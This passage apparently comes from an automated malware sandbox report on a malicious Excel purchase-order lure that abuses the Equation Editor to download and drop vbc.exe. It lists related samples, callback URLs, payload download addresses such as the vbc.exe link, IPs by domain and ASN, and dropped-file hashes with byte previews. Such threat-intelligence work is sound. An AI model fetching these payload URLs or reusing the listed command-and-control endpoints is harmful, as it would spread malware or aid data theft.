                                                                                                                                                                      • www.bestpodstudio.com/mz59/?DxlpdH=z/+6kJkwZlQ3zlrDh4QpXoSyzw+77qJSyUli2W5ZA+NNv7nK+Cazy2/hoyzn+UXLJ9fD&k2Jxtb=fDHHbT_hY
                                                                                                                                                                      192.227.129.22PRODUCT INQUIRY BNQ1.xlsxGet hashmaliciousBrowse
                                                                                                                                                                      • 192.227.129.22/vbc.exe
                                                                                                                                                                      P.O_ 39134.xlsxGet hashmaliciousBrowse
                                                                                                                                                                      • 192.227.129.22/vbc.exe
                                                                                                                                                                      EME.39134.xlsxGet hashmaliciousBrowse
                                                                                                                                                                      • 192.227.129.22/vbc.exe
                                                                                                                                                                      209.126.13.1517OKYiP6gHy.exeGet hashmaliciousBrowse
                                                                                                                                                                      • www.hostingbisniz.com/mz59/?DxlpdH=OW9WwwQZQ7zpOH1UiXZ2qNcRwznn7rmsJyPoqW3tiXRjMb9qVkHQSNqCtatCKZD/Llsl&k2Jxtb=fDHHbT_hY
                                                                                                                                                                      23.227.38.74Shipping documents.xlsxGet hashmaliciousBrowse
                                                                                                                                                                      • www.cocogreensoil.com/sqe3/?cB=oXNDcZDlqRKH2hC5SoJ7dwvXOnFb9nMS++dxAtrFY1wLaleqRTsShLolmYf7RNmK9qOopw==&NreT=XJE0G4nHflj
                                                                                                                                                                      PO98765.exeGet hashmaliciousBrowse
                                                                                                                                                                      • www.bloochy.com/sbmh/?4hLtM4=skYwVssfaMrhlhDh0By1+2yNFudwvP+0WfyEru4f7dWeU3QH+Wh99HLFJYHhc5Wxp3Js&n0DXRn=xPJxZNG0xPz
                                                                                                                                                                      inv.exeGet hashmaliciousBrowse
                                                                                                                                                                      • www.nairobi-paris.com/hko6/?rL0=lnnZpxegrJKzTox397oQ7hMdCzz828WEhmoqeuNRxe7x8IdLeLrXs8RcdM6azEYnfszPY9qEDw==&3f_X=Q2J8lT4hKB4
                                                                                                                                                                      EME_PO.39134.xlsxGet hashmaliciousBrowse
                                                                                                                                                                      • www.smartropeofficial.com/mz59/?VrGd-0=igsD6CIxfIdP/BmaDcqJRhdi7opbp9JZE0pffGSxnJfYzYphWR5FxPFRxokm8KQT47JnMg==&MDKtU=Jxotsl4pOvw
                                                                                                                                                                      Shipment Document BLINV And Packing List Attached.exeGet hashmaliciousBrowse
                                                                                                                                                                      • www.veryinteresthing.com/bg8v/?DXIXO=Ci+8b5yVi0HjeRDPketSQzJsjy9TvJsNh1v2CR5lKm1ZvVcQvafggDw5DTXIkkN2hOV2&Jt7=XPv4nH2h
                                                                                                                                                                      184.168.131.241inv.exeGet hashmaliciousBrowse
                                                                                                                                                                      • www.bitcoincandy.xyz/hko6/?3f_X=Q2J8lT4hKB4&rL0=tXOddRziBZnyKXnXE9Kw2rrsPuH0SCZGoRNpDj1avThKGPBCs+LEjAOKKARNXpDVSdN5zM8g6w==
                                                                                                                                                                      Payment - Swift Copy.exeGet hashmaliciousBrowse
                                                                                                                                                                      • www.mercedes-dieselclaims.com/mnc/?NR0=XnzLeNl8&-ZU=vOGmWWeyo6tiCd2B1+89qezWOIY3ON5shOccvWZd7PNL2gKjBNGJbs+lhzDH6ySQETa7
                                                                                                                                                                      EME_PO.39134.xlsxGet hashmaliciousBrowse
                                                                                                                                                                      • www.cna-notary.com/mz59/?VrGd-0=2h5hbT8wvHGvzmy0HBHdrVji2gh81Syn3N+I4+PuKAlq7cZqA7t6XPE7i2q+Hmh3HpIQwA==&MDKtU=Jxotsl4pOvw
                                                                                                                                                                      7OKYiP6gHy.exeGet hashmaliciousBrowse
                                                                                                                                                                      • www.cna-notary.com/mz59/?DxlpdH=2h5hbT81vAGrz2+4FBHdrVji2gh81Syn3NmYk9TvOglr7t1sHr82BL85hTGCcGVEIodg&k2Jxtb=fDHHbT_hY
                                                                                                                                                                      kayx.exeGet hashmaliciousBrowse
                                                                                                                                                                      • www.jibenentreprenad.mobi/bg8v/?dR-0T=BcRzG6gD98FnRJnM8S7gZqeq6OFb5sR0iVW6Pm7cF5yWostREqJtYuV2Juo62Dzc0Jb1&Fxl0dR=KdShEXiX
                                                                                                                                                                      Payment Advice - Advice Ref GLV823990339.exeGet hashmaliciousBrowse
                                                                                                                                                                      • www.crestviewlab.com/gyo3/?Ez=NAGhR2B897xHmSjBg9ib6asY38nnY4Q4yyZMB+Gj9us/EkxfPSnFK1AIwmtjw0HkqurxQu+N+g==&lhud=TjfdU2S
                                                                                                                                                                      MV.KMTC JEBEL ALI_pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                      • www.carwashcustom.com/y9z/?uFQl=fY5jeAtp1RdNWaxm5n6iTAw0V/8P2zZ8OtxyEaiRQwZkZsJ+cMlcko/IfBrIT9W4DRCI&CTvp=fv10_lYhrxJtW6
                                                                                                                                                                      PO0119-1620 LQSB 0320 Siemens.exeGet hashmaliciousBrowse
                                                                                                                                                                      • www.fluidartindia.com/sppe/?DnadT=jX6zF4/w1i207zkr1riL1VOogE6y0WgJJqDlfpP213KajKiR8CXisvGZ1eNGgJa3LVxH&DxlLi=2dmX
                                                                                                                                                                      PROOF OF PAYMENT.exeGet hashmaliciousBrowse
                                                                                                                                                                      • www.fastsalvage.com/mua8/?nflpdH=B0qyrwayxD8wcQG3Qbr3RYD+R2QNZFulkGJHcFvF3VxCu8MwJpoGpma0wXvOyVIO8Q3D&w48t=0pY022IXUBwLfpfP
                                                                                                                                                                      POSH XANADU Order-SP-20-V241e.xlsxGet hashmaliciousBrowse
                                                                                                                                                                      • www.upgradetomastery.com/dtn/?8ptdvJ=KT0pXTAPFjE0&lb=VKiUsABvcSkQZcVKnfuC8vDN1G6FwU6V98eOKuQh0UKncmK0g9i99ZESG6mkSNKYPbsfxw==
                                                                                                                                                                      jrzlwOa0UC.exeGet hashmaliciousBrowse
                                                                                                                                                                      • www.enerjikbilin.com/t4vo/?Dxlpd=zukTNKzNObihvOlNQP8dibmkyr3w1VW9LXTzCAncEay1uwCtweD+d3+np2U01Umj+Zu9uG7hEQ==&lhuh=TxlhfFN
                                                                                                                                                                      PDF ICITIUS33BUD10307051120003475.exeGet hashmaliciousBrowse
                                                                                                                                                                      • www.applywithrand.com/iic6/?DV8TCr-=yPIpthC5MtqHoy4c0EHwGIh2/j/8JQggFFSPND+1HWd+sJXvHNRkMzNQskTglzxbquBo&U0DH6=kf50d0Dh3Z44mV
                                                                                                                                                                      Invoice.exeGet hashmaliciousBrowse
                                                                                                                                                                      • www.forsythcourtseniorliving.com/rhk/?2dtd9h=mjpPyjuxPhk0&3f=zT6q1JDKfhV2EvEX8/2jysHCuf0tBNhQsP2YiyzGtHytBzTfjT3OdZVqaOBr+/tLjoXCZ7lNZQ==
                                                                                                                                                                      COMMERCIAL INVOICE BILL OF LADING DOC.exeGet hashmaliciousBrowse
                                                                                                                                                                      • www.qubitlaboratories.com/o9b2/?J484=xPJtLXbX&u6u4=3LGybaBE5u/MmrsyhaNWg7uW/vPINQPoFsX0YN7a6o2wuLOqT6PUoiZZCA7i0eNZ3qK2
                                                                                                                                                                      Invoice.exeGet hashmaliciousBrowse
                                                                                                                                                                      • www.bitcoincandy.xyz/hko6/?7nE8Zrx=tXOddRziBZnyKXnXE9Kw2rrsPuH0SCZGoRNpDj1avThKGPBCs+LEjAOKKD9kUp/tb+4v&LXed=XPUxDVP8ThYHYxS0
                                                                                                                                                                      ALPHA_PO_16201844580.exeGet hashmaliciousBrowse
                                                                                                                                                                      • www.timberlinepallets.com/ihj8/?FDHH=Cnt+6nHyGXRUU+110cZEsnWWKj+9Yye+cLBJL0AmBtVe9ccrmOicj2d+yDCCaYm3sR4n&Rl=VtxXE
                                                                                                                                                                      QFCPrfsJLeeYpN5.exeGet hashmaliciousBrowse
                                                                                                                                                                      • www.outsourcedbim.com/k8b/
                                                                                                                                                                      nnnf.exeGet hashmaliciousBrowse
                                                                                                                                                                      • www.cheap-housekeeping.com/bns/?uVg8=DFuD2CwFEFTZMlFq3QqcpFj8rgjdPttxv8Nv7PXL+ekRjc0K8Zw+qc+ng0ER0qX/SACF&R48Hj=NtxpKjcxbp2XFTE
                                                                                                                                                                      iz06VVmz0l.exeGet hashmaliciousBrowse
                                                                                                                                                                      • www.maskupforschool.com/d8h/?rVOp32=b4AuRmO5mJIYTa03Ryq3knCjLs8pOUSKEouWqDiq2O5vgkJvPoAU5b8ioX3ikWgjFYnw&GV2p=8pMx2630Gf6TGP
                                                                                                                                                                      0VikCnzrVT.exeGet hashmaliciousBrowse
                                                                                                                                                                      • www.enerjikbilin.com/t4vo/?2db=X48HMfxHf&-Z8=zukTNKzNObihvOlNQP8dibmkyr3w1VW9LXTzCAncEay1uwCtweD+d3+np2UNqlGgwPy6uG7mXg==

                                                                                                                                                                      Domains

                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                      sbsfe-p11r.geo.mf0.yahoodns.net7OKYiP6gHy.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 67.195.197.25
                                                                                                                                                                      SWIFT TRANSFER.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 67.195.197.25
                                                                                                                                                                      shops.myshopify.comShipping documents.xlsxGet hashmaliciousBrowse
                                                                                                                                                                      • 23.227.38.74
                                                                                                                                                                      PO98765.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 23.227.38.74
                                                                                                                                                                      inv.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 23.227.38.74
                                                                                                                                                                      EME_PO.39134.xlsxGet hashmaliciousBrowse
                                                                                                                                                                      • 23.227.38.74
                                                                                                                                                                      Shipment Document BLINV And Packing List Attached.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 23.227.38.74
                                                                                                                                                                      Swift Copy.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 23.227.38.74
                                                                                                                                                                      Inv.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 23.227.38.64
                                                                                                                                                                      CSq58hA6nO.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 23.227.38.64
                                                                                                                                                                      New Order .xlsxGet hashmaliciousBrowse
                                                                                                                                                                      • 23.227.38.64
                                                                                                                                                                      NQQWym075C.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 23.227.38.64
                                                                                                                                                                      Order specs19.11.20.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 23.227.38.64
                                                                                                                                                                      Payment Advice - Advice Ref GLV823990339.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 23.227.38.64
                                                                                                                                                                      SWIFT_HSBC Bank.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 23.227.38.64
                                                                                                                                                                      ORDER SPECIFITIONS.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 23.227.38.64
                                                                                                                                                                      anthony.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 23.227.38.64
                                                                                                                                                                      udtiZ6qM4s.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 23.227.38.64
                                                                                                                                                                      qAOaubZNjB.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 23.227.38.64
                                                                                                                                                                      uM0FDMSqE2.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 23.227.38.64
                                                                                                                                                                      new file.exe.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 23.227.38.64
                                                                                                                                                                      jrzlwOa0UC.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 23.227.38.64

                                                                                                                                                                      ASN

                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                      ONEANDONE-ASBrauerstrasse48DEfSBya4AvVj.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 74.208.236.48
                                                                                                                                                                      PO987556.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 217.160.0.166
                                                                                                                                                                      Inv.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 217.160.0.173
                                                                                                                                                                      Purchase Order 40,7045.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 74.208.236.115
                                                                                                                                                                      Order specs19.11.20.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 217.160.0.74
                                                                                                                                                                      Purchase Order 40,7045.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 74.208.236.115
                                                                                                                                                                      Payment Advice - Advice Ref GLV823990339.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 217.160.0.92
                                                                                                                                                                      http://www.winter-holztechnik.de/Get hashmaliciousBrowse
                                                                                                                                                                      • 217.160.0.67
                                                                                                                                                                      Re- attached Instruction.xlsxGet hashmaliciousBrowse
                                                                                                                                                                      • 82.165.48.223
                                                                                                                                                                      docs.htmlGet hashmaliciousBrowse
                                                                                                                                                                      • 74.208.236.216
                                                                                                                                                                      Prueba de pago.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 217.76.146.62
                                                                                                                                                                      baf6b9fcec491619b45c1dd7db56ad3d.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 217.160.0.224
                                                                                                                                                                      Narud#U017eba 0521360021.xlsxGet hashmaliciousBrowse
                                                                                                                                                                      • 74.208.22.240
                                                                                                                                                                      Quote Request.xlsxGet hashmaliciousBrowse
                                                                                                                                                                      • 82.165.48.223
                                                                                                                                                                      anthony.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 217.160.0.199
                                                                                                                                                                      8miw6WNHCt.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 74.208.5.21
                                                                                                                                                                      WO4jeXWl0L.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 74.208.45.104
                                                                                                                                                                      5YCsNuM4a9.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 74.208.45.104
                                                                                                                                                                      eLaaw7SqMi.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 74.208.5.22
                                                                                                                                                                      vi9qEkXlGm.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 217.76.150.19
                                                                                                                                                                      sun-asnSC0VikCnzrVT.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 102.134.56.244
                                                                                                                                                                      PI210941.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 102.134.56.244
                                                                                                                                                                      WQA101320.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 102.134.56.244
                                                                                                                                                                      fT2aAFPT1F.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 102.134.58.12
                                                                                                                                                                      fT2aAFPT1F.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 102.134.58.12
                                                                                                                                                                      AS-COLOCROSSINGUSShipping documents.xlsxGet hashmaliciousBrowse
                                                                                                                                                                      • 216.170.126.121
                                                                                                                                                                      document-2009439254.xlsGet hashmaliciousBrowse
                                                                                                                                                                      • 198.46.155.18
                                                                                                                                                                      document-2009439254.xlsGet hashmaliciousBrowse
                                                                                                                                                                      • 198.46.155.18
                                                                                                                                                                      document-1940099967.xlsGet hashmaliciousBrowse
                                                                                                                                                                      • 198.46.155.18
                                                                                                                                                                      document-1940099967.xlsGet hashmaliciousBrowse
                                                                                                                                                                      • 198.46.155.18
                                                                                                                                                                      document-2020425077.xlsGet hashmaliciousBrowse
                                                                                                                                                                      • 198.46.155.18
                                                                                                                                                                      document-2020425077.xlsGet hashmaliciousBrowse
                                                                                                                                                                      • 198.46.155.18
                                                                                                                                                                      document-1851433106.xlsGet hashmaliciousBrowse
                                                                                                                                                                      • 198.23.156.170
                                                                                                                                                                      document-1851433106.xlsGet hashmaliciousBrowse
                                                                                                                                                                      • 198.23.156.170
                                                                                                                                                                      document-1959916382.xlsGet hashmaliciousBrowse
                                                                                                                                                                      • 198.23.156.170
                                                                                                                                                                      document-1959916382.xlsGet hashmaliciousBrowse
                                                                                                                                                                      • 198.23.156.170
                                                                                                                                                                      document-2078943362.xlsGet hashmaliciousBrowse
                                                                                                                                                                      • 198.46.155.18
                                                                                                                                                                      document-1999796651.xlsGet hashmaliciousBrowse
                                                                                                                                                                      • 198.46.155.18
                                                                                                                                                                      document-2078943362.xlsGet hashmaliciousBrowse
                                                                                                                                                                      • 198.46.155.18
                                                                                                                                                                      document-1999796651.xlsGet hashmaliciousBrowse
                                                                                                                                                                      • 198.46.155.18
                                                                                                                                                                      document-189497319.xlsGet hashmaliciousBrowse
                                                                                                                                                                      • 198.23.156.170
                                                                                                                                                                      document-2004587833.xlsGet hashmaliciousBrowse
                                                                                                                                                                      • 198.23.156.170
                                                                                                                                                                      document-189497319.xlsGet hashmaliciousBrowse
                                                                                                                                                                      • 198.23.156.170
                                                                                                                                                                      document-184003024.xlsGet hashmaliciousBrowse
                                                                                                                                                                      • 198.23.156.170
                                                                                                                                                                      document-2004587833.xlsGet hashmaliciousBrowse
                                                                                                                                                                      • 198.23.156.170
                                                                                                                                                                      YAHOO-3US7OKYiP6gHy.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 67.195.197.25
                                                                                                                                                                      8miw6WNHCt.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 74.6.136.150
                                                                                                                                                                      0P0cZbXEbK.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 67.195.204.75
                                                                                                                                                                      uvjAwriS1c.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 67.195.204.80
                                                                                                                                                                      ZYhucZndrm.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 67.195.204.77
                                                                                                                                                                      Zped7c3dam.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 67.195.204.77
                                                                                                                                                                      bLPTjx97o4.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 67.195.204.73
                                                                                                                                                                      AC1EXbN0nE.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 67.195.204.79
                                                                                                                                                                      Ohb6q4Utz8.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 67.195.204.72
                                                                                                                                                                      Z7wySV8sRC.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 67.195.204.75
                                                                                                                                                                      NmoVPyVD86.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 67.195.204.77
                                                                                                                                                                      zG8cVHvxat.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 98.139.175.225
                                                                                                                                                                      DOC_PDF1.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 74.6.141.46
                                                                                                                                                                      GPSOpSQQHn.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 67.195.204.73
                                                                                                                                                                      SecuriteInfo.com.Trojan.Siggen10.14421.6375.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 67.195.204.74
                                                                                                                                                                      SecuriteInfo.com.Trojan.Siggen10.14421.24699.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 67.195.204.79
                                                                                                                                                                      dOtSDl5N2j.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 67.195.204.73
                                                                                                                                                                      pLHcPFCu5N.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 67.195.204.73
                                                                                                                                                                      bmQ420M9JO.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 67.195.204.73
                                                                                                                                                                      sKu7FoPlk3.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 67.195.204.73

                                                                                                                                                                      JA3 Fingerprints

                                                                                                                                                                      No context

                                                                                                                                                                      Dropped Files

                                                                                                                                                                      No context

                                                                                                                                                                      Created / dropped Files

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
                                                                                                                                                                      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                      Category:downloaded
                                                                                                                                                                      Size (bytes):515072
                                                                                                                                                                      Entropy (8bit):7.4607975468542165
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12288:qEEoEPCriH+klc6V1OqjciM8RHK/9ZzCsC2iQmkLa8tt8LF:DNiMp/9Zzq2iYLR8
                                                                                                                                                                      MD5:4A105D55BFF1F7304E01CE7198BADA6B
                                                                                                                                                                      SHA1:423AF325F62A4B075CAA8422A36C3A3E2426C2B8
                                                                                                                                                                      SHA-256:BAB96ED17C1226911DE27241224E33A3257BBEC0408A4E311167E2C972B39C3E
                                                                                                                                                                      SHA-512:48A337B15B0ED67F8CD3D4D136BD6A29F492777EBBD755281AE99AC8EF7E82696C4947C57509235EFEA5C02EAB18911AD7970A5AF913D469933E6D90898793BF
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                                                                      Reputation:low
                                                                                                                                                                      IE Cache URL:http://192.227.129.22/vbc.exe
                                                                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....._..............0.................. ........@.. .......................@............@.....................................O............................ ....................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H.......H................................................................0..)........{.........(....t......|......(...+...3.*....0..)........{.........(....t......|......(...+...3.*....0..)........{.........(....t......|......(...+...3.*....0..)........{.........(....t......|......(...+...3.*..s....}.....~....}.....(.......(.....*.0.............(........(......*.................0..4........r...p(.............s....}........{......(....}....*:..{....(....&*..0..................
                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\46B6EF3.emf
                                                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1099960
                                                                                                                                                                      Entropy (8bit):2.015335768317307
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3072:KXtr8tV3Iqf4ZdAt06J6dabLr92W2qtX2cy:IahIFdyiaT2qtXw
                                                                                                                                                                      MD5:B74BAFC856BD93ADEC1905438AD0D8B5
                                                                                                                                                                      SHA1:5DAE3A28DD5F8E0CF0CADAEA61F56638829F80C7
                                                                                                                                                                      SHA-256:85EA8291C352F53D27668F058AB273A227040E104A09772A5D5A463AC2EF42FA
                                                                                                                                                                      SHA-512:726F74535A46135155CB8ED0B251CBB70FC1F8F296117C48148BB4646D2098F1797BAA91CFD6FE02CA07633524BDCF8A6775646AB308898CCF2525B962485690
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:low
                                                                                                                                                                      Preview: ....l...........S................@...%.. EMF........&...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..............................................I.......%...........%...................................R...p................................@."C.a.l.i.b.r.i...............................................................P........N.QP...H...........4....N.QP...H... ....yTPH...P... ............zTP............................................X...%...7...................{ .@................C.a.l.i.b.r.................X...H...|....2MP.................{KP............dv......%...........%...........%...........!.......................I......."...........%...........%...........%...........T...T..........................@.E.@T...........L...............I.......P... ...6...F..........EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A10CF879.jpeg
                                                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                      File Type:gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):48770
                                                                                                                                                                      Entropy (8bit):7.801842363879827
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
                                                                                                                                                                      MD5:AA7A56E6A97FFA9390DA10A2EC0C5805
                                                                                                                                                                      SHA1:200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
                                                                                                                                                                      SHA-256:56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
                                                                                                                                                                      SHA-512:A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:moderate, very likely benign file
                                                                                                                                                                      Preview: ......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....
                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DD647458.jpeg
                                                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                      File Type:gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):48770
                                                                                                                                                                      Entropy (8bit):7.801842363879827
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
                                                                                                                                                                      MD5:AA7A56E6A97FFA9390DA10A2EC0C5805
                                                                                                                                                                      SHA1:200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
                                                                                                                                                                      SHA-256:56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
                                                                                                                                                                      SHA-512:A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:moderate, very likely benign file
                                                                                                                                                                      Preview: ......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....
                                                                                                                                                                      C:\Users\user\Desktop\~$EME_PO.47563.xlsx
                                                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):330
                                                                                                                                                                      Entropy (8bit):1.4377382811115937
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                                                                                                                                                                      MD5:96114D75E30EBD26B572C1FC83D1D02E
                                                                                                                                                                      SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                                                                                                                                                                      SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                                                                                                                                                                      SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Reputation:moderate, very likely benign file
                                                                                                                                                                      Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                      C:\Users\Public\vbc.exe
                                                                                                                                                                      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):515072
                                                                                                                                                                      Entropy (8bit):7.4607975468542165
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12288:qEEoEPCriH+klc6V1OqjciM8RHK/9ZzCsC2iQmkLa8tt8LF:DNiMp/9Zzq2iYLR8
                                                                                                                                                                      MD5:4A105D55BFF1F7304E01CE7198BADA6B
                                                                                                                                                                      SHA1:423AF325F62A4B075CAA8422A36C3A3E2426C2B8
                                                                                                                                                                      SHA-256:BAB96ED17C1226911DE27241224E33A3257BBEC0408A4E311167E2C972B39C3E
                                                                                                                                                                      SHA-512:48A337B15B0ED67F8CD3D4D136BD6A29F492777EBBD755281AE99AC8EF7E82696C4947C57509235EFEA5C02EAB18911AD7970A5AF913D469933E6D90898793BF
                                                                                                                                                                      Malicious:true
